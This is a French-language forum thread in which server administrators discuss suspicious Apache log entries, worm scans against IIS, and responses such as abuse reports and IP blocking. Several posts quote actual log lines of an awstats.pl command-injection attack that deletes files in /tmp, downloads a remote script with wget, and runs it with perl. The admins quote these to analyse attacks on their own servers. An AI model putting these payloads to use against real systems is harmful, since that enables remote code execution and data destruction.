J'ai des trucs comme ca dans mes logs apache :
 

 
Pas de referer, pas de user agent, juste un GET / et pas de GET des autres elements de la page d'acceuil.
 
Ces requetes sont beaucoup plus nombreuses depuis 2 mois environ, et viennent a 95% de chez Free (le serveur est sur une Freebox lui aussi).
C'est quoi, juste un scan de port ?

ce sont des PC infectés (webdav) qui essayent de lancer des attaques.  

Comment se premunir de se type attaques?.  
 
Il y a des spécialiste de la sécurité pour nous donner des conselle;

si c'est apache il n'y a aucun risque il me semble que c'est uniquement pour IIS.

Ah intéressant merci je me posais exactement la même question depuis hier.
Et on peut rien faire pour informer les pauvres infectés ?
 
Bonne après-midi

tu contactes le service abuse de leur fai ou tu bannis leur IP (iptables drop)

 
Je peux comprendre ton point vu .  
Mais un serveur qui tourne sur iis ou Linux si il est ma configuré laisse des failles c'est certain..  également une installation par defauts..  
 
il y a toujours des enseignements a tenir des spécialistes en sécurite..  
il y a des palteformes client-serveur sous  windows qui fonctionne bien et très bien sécurisé..

les attaques que initiators a rapporté sont dédiés à IIS non patché. Cependant il ne faut pas oublié qu'Apache n'est pas à l'abris d'attaque ou carrément c'est les scripts CGI (ex: attaque via awstats.pl)
Il faut toujours mettre à jour ses services (FTP, HTTP...) et leur contenu (script php, perl...) que l'on tourne sous Windows ou Linux.

Ouais de tte facon faut toujours garder les versions à jours mais perso avec apt y a pas de soucis  .
 
Sinon je veux pas leur poser de problèmes mais plutôt les informer qu'ils en ont un mais c sur je vois pas de manière simple pour faire ça avec leur ip.

2 solutions :
- soit tu les ignores
- soit tu les blacklists
car si l'abuse de Free réagit, il risque de couper sa connexion jusqu'à ce que l' "attaquant" répare son PC.

ce ne serait pas un mal a mon avis .

Y'aurait bcp moins d'internautes d'un coup, tiens ...  

 
cette économie de BP du coup

Moins d'emmerdeurs sur les forums    

J'ai cherche quelques info sur les attaques sur awstats.pl
J'en ai jamais vu passer sur mon serveur. Je vois surtout passer des trucs destines a des IIS en fait.

tu n'as jamais eu de ?
"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://150.214.140.196/.it/icet;perl%20i
cet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"

J'ai eu quelques truc dans ce style la:
 
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi/awstats.pl HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:25 +0200] "GET //awstats/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
 
Et sur un autre serveur j'ai effectivement eu quelques trucs comme ca:
 
203.114.64.241 - - [13/Sep/2005:07:38:38 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:39 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:40 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
Mais moins de 10 requetes, et uniquement le 13 septembre.

 
Plus besoin de modos